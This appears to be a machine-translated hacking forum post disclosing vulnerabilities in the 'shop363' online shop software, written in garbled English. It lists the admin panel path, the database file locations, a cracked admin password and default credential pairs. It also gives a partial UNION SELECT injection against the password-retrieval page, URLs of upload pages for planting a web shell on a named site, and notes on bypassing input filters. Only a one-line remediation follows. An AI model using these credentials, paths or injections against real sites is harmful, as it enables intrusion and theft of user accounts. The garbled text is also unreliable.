A few days ago, I took the Shell method in the t00ls background for help and got an answer. It was indeed possible to capture packets and upload them to the Shell. Then I will release the vulnerability. Very spam. This is the real way to kill the program. The test is successful on the official website.
This program is not safe, but one of the replace () functions is well written, but it cannot be found how to write it, filter blank space, select, % 20, +, And/**/in the injection. It is very troublesome to search for statements with vulnerabilities, and I will not write them anymore. I will go straight to the bottom-up method to get the password and account quickly.
Keyword: technical support: shop363.net
Background address:/admin_shop363/
Database: Data_Shop363/Date_Shop363_shop.mdb
Database decryption tool: AccessUnLock.exe
Cracked account: admin Password: actionshop363?
Backup database:
Data_Shop363/Date_Shop363_shop.mdb default database
Bbs/data/# sjyshop363.mdb Forum Database
Home retrieval password Injection Vulnerability (take Shell is not big, but some user name and password can burst) direct access to http://www.shop363.net/shop/getpwd.asp
Union select, 39,40, 41 from shop363_user
Displayed as 7
Change to username password in turn
You can also use the background default password: action first
Group 2: admin admin888
Group 3: admin (90% can directly enter the background)
Shell: http://sniff3r.com/delivery_printer/upfile1.asp
Http://sniff3r.com/csv/upfile1.asp
Upload captured packets. Not explained. Figure-based speech:
Www.2cto.com solution: homepage password retrieval page: shop/getpwd. asp Filter